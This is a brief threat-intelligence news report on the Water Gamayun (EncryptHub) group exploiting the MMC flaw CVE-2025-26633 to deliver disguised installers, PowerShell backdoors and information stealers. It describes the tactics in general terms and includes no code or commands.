A Russian-linked hacking group known as Water Gamayun (also tracked as EncryptHub and LARVA-208) is actively exploiting a Windows vulnerability identified as CVE-2025-26633. This flaw, found in the Microsoft Management Console (MMC), is being used to execute malicious .msc files and deploy various types of malware.
The attackers are using malicious provisioning packages (.ppkg), signed Windows Installer files (.msi), and .msc console files to distribute backdoors and information stealers. The malware is often disguised as legitimate applications such as DingTalk, QQTalk, and VooV Meeting. These installers trigger PowerShell scripts that download and run follow-up payloads.
Two newly identified PowerShell-based backdoors, SilentPrism and DarkWisp, are used for remote access, command execution, system reconnaissance, data theft, and maintaining persistence. Communication with the command-and-control server is maintained via TCP port 8080, with commands delivered in a base64-encoded format.
In some attacks, a loader named MSC EvilTwin is used to exploit the CVE-2025-26633 vulnerability and drop additional malware such as Rhadamanthys Stealer and StealC. The attackers also deploy custom PowerShell-based stealer variants derived from the open-source Kematian Stealer, capable of collecting sensitive information including browser data, Wi-Fi credentials, session data, and cryptocurrency wallet recovery phrases.
One version of the stealer uses a technique involving the IntelliJ runnerw.exe process to execute remote PowerShell scripts, showcasing a living-off-the-land approach. The group has also been observed distributing malware like Lumma Stealer, Amadey, and various clipboard hijackers.
Analysis of the group’s infrastructure shows it is also used to deploy remote access tools like AnyDesk and execute base64-encoded commands sent from their servers. Their use of legitimate-looking signed installers and multiple delivery methods demonstrates a focus on persistence and stealth in their operations.
